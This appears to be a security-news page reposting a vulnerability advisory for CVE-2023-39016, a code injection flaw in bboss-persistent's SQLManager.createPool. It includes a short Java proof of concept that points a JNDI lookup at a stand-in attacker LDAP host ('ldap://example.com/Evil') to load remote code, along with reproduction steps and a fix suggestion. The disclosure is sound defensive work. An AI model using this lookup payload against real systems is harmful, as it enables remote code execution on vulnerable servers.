Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-39016: There's a code injection vulnerability of `com.frameworkset.common.poolman.util.SQLManager.createPool` · Issue #I7MH08 · bboss/bboss - Gitee

bboss-persistent v6.0.9 and below was discovered to contain a code injection vulnerability in the component com.frameworkset.common.poolman.util.SQLManager.createPool. This vulnerability is exploited via passing an unchecked argument.

CVE
Open in Source
#sql#vulnerability#git#ldap

Affected Version
The latest version 6.0.9 and below.

Describe the vulnerability
There is a method, com.frameworkset.common.poolman.util.SQLManager.createPool, designed to create a SQL connection pool. However, passing an unchecked argument to this API can lead to the execution of arbitrary commands. For instance, following codes can lead to the execution of arbitrary commands from attackers:

        JDBCPoolMetaData metaData = new JDBCPoolMetaData();
        metaData.setExternaljndiName("ldap://example.com/Evil");
        metaData.setExternal(true);
        SQLManager manager = SQLManager.getInstance();
        manager.createPool(metaData);

To Reproduce
First, establish an LDAP server and provide malicious code. Then, just execute above codes would reproduce it.

Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE